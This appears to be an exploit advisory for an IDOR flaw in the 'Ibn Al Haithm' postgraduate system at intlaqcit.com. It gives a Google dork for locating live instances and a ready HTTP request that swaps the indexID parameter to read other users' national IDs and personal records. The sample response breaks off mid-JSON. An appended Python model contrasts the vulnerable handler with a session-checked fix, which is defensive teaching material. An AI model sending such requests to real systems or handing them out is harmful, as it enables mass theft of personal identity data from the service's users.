# Exploit Title: Ibn Al Haithm intlaqcit.com - Multiple Vulnerabilities
# Date: May 19, 2025
# Exploit Author: wa0_3
# Telegram: @wa0_3
# Vendor Homepage: intlaqcit.com
# Version: 1.0
# CVE: N/A
# Google Dork: intext: Ibn Al Haithm Postgraduates Electronic System inurl:intlaqcit.com intext:"Ibn Al Haithm"

===============================================================================================================================

# Description

This vulnerability is caused by a missing access control check on the indexID parameter of the selectOnlineReadContData API method (dispatched through the /getJCI endpoint). The server returns the record identified by indexID without verifying that it belongs to the authenticated user, so an attacker who changes this parameter can read other users' sensitive data, including full name, national ID, birth date, and job information, resulting in a full personal data breach.

===============================================================================================================================

Vulnerability: IDOR

## Proof of Concept (PoC):

POST /getJCI HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:137.0) Gecko/20100101 Firefox/137.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRFToken: null
X-Requested-With: XMLHttpRequest
Content-Length: 147
Connection: keep-alive
Cookie: sysDate="your cookie"

param0=onlineReg.onlineRegData&param1=selectOnlineReadContData&param2=userID&param3=%7B%22sysLang%22%3A%22A%22%2C%22indexID%22%3A%22800024307%22%7D

=============================================================================================================================================================================

## Response:

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Set-Cookie: (your cookie)
Server: TornadoServer/4.4
Content-Length: 1075

{
  "rows": [{
    "dataAvailable": "True",
    "row": {
=============================================================================================================================================================================

# Credits: Discovered and reported by wa0_3
Telegram: @wa0_3
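The following is an added example (not the vendor's code, whose backend is not public) modelling the getJCI dispatch described above: the vulnerable handler resolves the record from the client-supplied indexID in param3, while the hardened handler derives the record key from the session and refuses any mismatching indexID. The session table, record store and sample body are constructed placeholders.

```python
# Added example: server-side model of the selectOnlineReadContData IDOR and its fix.
# SESSIONS, RECORDS and SAMPLE_BODY are constructed placeholders, not real data.
import json
from urllib.parse import parse_qs

# Constructed: which indexID belongs to which session cookie value.
SESSIONS = {"sess-alice": "100001", "sess-bob": "100002"}
RECORDS = {
    "100001": {"fullName": "Alice", "nationalID": "A-1"},
    "100002": {"fullName": "Bob", "nationalID": "B-2"},
}
# Constructed: alice's session asking for bob's indexID (same shape as the PoC body).
SAMPLE_BODY = ("param0=onlineReg.onlineRegData&param1=selectOnlineReadContData"
               "&param2=userID&param3=%7B%22sysLang%22%3A%22A%22%2C%22indexID%22%3A%22100002%22%7D")

def parse_request(body: str) -> dict:
    """Parse the param0..param3 form body; param3 carries the JSON-encoded arguments."""
    form = parse_qs(body, keep_blank_values=True)
    return {
        "service": form.get("param0", [""])[0],
        "method": form.get("param1", [""])[0],
        "args": json.loads(form.get("param3", ["{}"])[0]),
    }

def select_online_read_cont_data_vulnerable(body: str, session_cookie: str) -> dict:
    """Vulnerable form: authenticated, but trusts indexID from the client (the IDOR)."""
    if session_cookie not in SESSIONS:
        return {"error": "unauthenticated"}
    index_id = str(parse_request(body)["args"].get("indexID", ""))
    row = RECORDS.get(index_id)
    return {"rows": [{"dataAvailable": str(row is not None), "row": row or {}}]}

def select_online_read_cont_data_fixed(body: str, session_cookie: str) -> dict:
    """Hardened form: the record key comes from the session; a foreign indexID is refused."""
    owner = SESSIONS.get(session_cookie)
    if owner is None:
        return {"error": "unauthenticated"}
    requested = str(parse_request(body)["args"].get("indexID", owner))
    if requested != owner:
        # Refuse and record it: this mismatch is the signal a defender should alert on.
        return {"error": "forbidden",
                "audit": f"session {session_cookie} requested foreign indexID {requested}"}
    return {"rows": [{"dataAvailable": "True", "row": RECORDS[owner]}]}
```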